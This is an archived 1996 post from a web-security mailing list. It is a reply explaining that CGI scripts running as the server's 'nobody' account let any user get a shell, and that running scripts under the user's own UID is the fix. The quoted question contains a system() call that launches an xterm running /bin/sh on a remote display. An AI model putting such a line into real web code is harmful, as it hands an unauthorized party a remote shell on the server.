[3667] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Dave Dittrich)
Tue Dec 3 16:43:03 1996
Date: Tue, 3 Dec 1996 11:56:07 -0800 (PST)
From: Dave Dittrich <dittrich@cac.washington.edu>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
On Tue, 3 Dec 1996, Andrea Di Fabio wrote:
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the followin:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
> I can now pop an exterm on my display as nobody.
> This way any user can gain access to the nobody account and
> have fun with it...
>
> Has this been discussed anywhere?
> Is there a fix out there?
Fabio,
Yes, this is a widespread problem. The solution is to run CGI scripts
as the user's UID, rather than as the server's UID. Until the most
recent beta of Apache, you had to do this with "wrapper" programs that
are setuid root and written carefully.
You cannot solve the problem by simply removing execute permission
from "xterm", since a user can trivially copy their own "xterm" binary
and run that as the server.
Note also that if all user scripts run as the server's UID, you can
trivially implement denial of service attacks on server processes,
read files created by others, and a host of other problems.
--
Dave Dittrich Client Services
dittrich@cac.washington.edu Computing & Communications
University of Washington
<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich@cac.washington.edu</a>
